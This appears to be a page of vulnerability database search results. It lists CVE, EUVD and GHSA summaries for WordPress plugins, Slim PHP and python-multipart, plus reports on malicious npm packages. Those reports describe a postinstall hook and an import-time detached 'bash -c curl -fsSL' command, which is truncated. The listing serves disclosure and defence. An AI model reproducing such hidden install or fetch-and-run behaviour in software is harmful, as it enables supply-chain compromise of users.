301592 matches found
CVE-2026-42667
Unauthenticated Sensitive Data Exposure in Bookly = 27.4 versions...
CVE-2026-42660
Subscriber Sensitive Data Exposure in Contest Gallery = 28.1.7 versions...
CVE-2026-42384
Unauthenticated Sensitive Data Exposure in Simply Schedule Appointments 1.6.11.2 versions...
CVE-2026-40796
Subscriber Sensitive Data Exposure in WPPizza = 3.19.9 versions...
CVE-2026-40789
Unauthenticated Sensitive Data Exposure in Amelia = 2.2 versions...
CVE-2026-40790
Subscriber Sensitive Data Exposure in WP SMS = 7.2.1 versions...
CVE-2026-39480
Unauthenticated Sensitive Data Exposure in Backup Migration = 2.1.1 versions...
CVE-2026-34891
Unauthenticated Sensitive Data Exposure in IDPay Payment Gateway for Woocommerce = 2.2.5 versions...
CVE-2026-27333
Unauthenticated Deserialization of untrusted data in Paid Videochat Turnkey Site = 7.3.23 versions...
Important: Red Hat Security Advisory: A Subscription Management tool for finding and reporting Red Hat product usage
A Subscription Management tool for finding and reporting Red Hat product usage Red Hat Discovery, also known as Discovery, is an inspection and reporting tool that finds, identifies, and reports environment data, or facts, such as the number of physical and virtual systems on a network, their...
Malicious code in lab-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9bbde4e4075983db0c5aba255bc29f84fb2536681b13e8289412cce5c3ee7a2e On npm install, the package's postinstall hook runs seccheck.js, which enumerates the host's network interfaces and proceeds only if an IPv4 address...
EUVD-2026-37008
Slim is a PHP micro framework that enables users to write simple web applications and APIs. In versions 4.4.0 through 4.15, if an application uses HttpException::setTitle and/or setDescription to include untrusted/request-derived data in the error title or description e.g. "No products found...
CVE-2026-48157 Slim has Reflected XSS in the HtmlErrorRenderer
Slim is a PHP micro framework that enables users to write simple web applications and APIs. In versions 4.4.0 through 4.15, if an application uses HttpException::setTitle and/or setDescription to include untrusted/request-derived data in the error title or description e.g. "No products found...
CVE-2026-48157
Slim PHP framework (versions 4.4.0–4.15) is affected by an HTML/JavaScript injection in error pages when HttpException::setTitle() and/or setDescription() are fed with untrusted data. The issue can occur in HTML error pages generated by Slim and is present even with displayErrorDetails = false; v...
MAL-2026-5834 Malicious code in @wacrot/infra-data-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1 On any require or import of @wacrot/infra-data-kit, src/index.js invokes addSupport at module top level, which spawns a detached bash -c 'curl -fsSL...
Malicious code in @wacrot/infra-data-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1 On any require or import of @wacrot/infra-data-kit, src/index.js invokes addSupport at module top level, which spawns a detached bash -c 'curl -fsSL...
GHSA-VFFW-93WF-4J4Q python-multipart: Content-Disposition parameter smuggling via RFC 2231/5987 extended parameters
Summary parseoptionsheader parsed Content-Disposition and Content-Type headers with email.message.Message, which transparently applies RFC 2231/5987 decoding. The extended parameter syntax filename=charset'lang'value, name=..., and the filename0/filename1 continuation form is decoded and surfaced...
python-multipart: Content-Disposition parameter smuggling via RFC 2231/5987 extended parameters
Summary parseoptionsheader parsed Content-Disposition and Content-Type headers with email.message.Message, which transparently applies RFC 2231/5987 decoding. The extended parameter syntax filename=charset'lang'value, name=..., and the filename0/filename1 continuation form is decoded and surfaced...
CVE-2026-52695
CVE-2026-52695 affects the WordPress plugin ABC Crypto Checkout (versions
EUVD-2026-36902
Unauthenticated Sensitive Data Exposure in ABC Crypto Checkout = 1.8.2 versions...